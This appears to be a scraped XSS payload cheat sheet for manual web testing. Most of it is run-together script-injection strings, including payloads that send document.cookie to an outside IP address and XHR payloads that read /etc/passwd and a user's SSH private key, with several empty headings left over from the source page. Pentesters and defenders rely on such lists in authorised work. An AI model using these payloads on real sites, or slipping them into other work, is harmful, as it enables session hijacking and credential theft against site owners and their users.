XSS
<script>alert(1)</script><Script>alert(1)</Script><sCript>alert(document.domain)</sCript><script>alert(123);</script><script>alert("test");</script><script>alert(document.cookie)</script></script><script>alert(document.cookie)</script>javascript:alert(document.cookie)javascript:prompt(document.cookie)'-alert(document.cookie)-'</script><svg onload=alert(document.cookie)>"onmouseover=alert(document.cookie)//{{$on.constructor('alert(1)')()}}<Script>alert(document.cookie)</Script><sCript>alert(document.domain)</sCript><script>alert(document.cookie);</script><script>alert(document.cookie);</script><script>alert(document.domain)</script><script>alert(document.cookie)</script><script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script><script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>XSS list for manual testing (main cases, high success rate).
Try it on:
URL query, fragment & path;
all input fields.
A nice way to store the payload
A payload to bypass Akamai WAF
Another one
BlindXSS-Payloads: #Max Payload 5-7
xss to lfi payload -
x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();
x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/passwd’);x.send();
get ssh private key -x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();
[Pinging the server down]
Last updated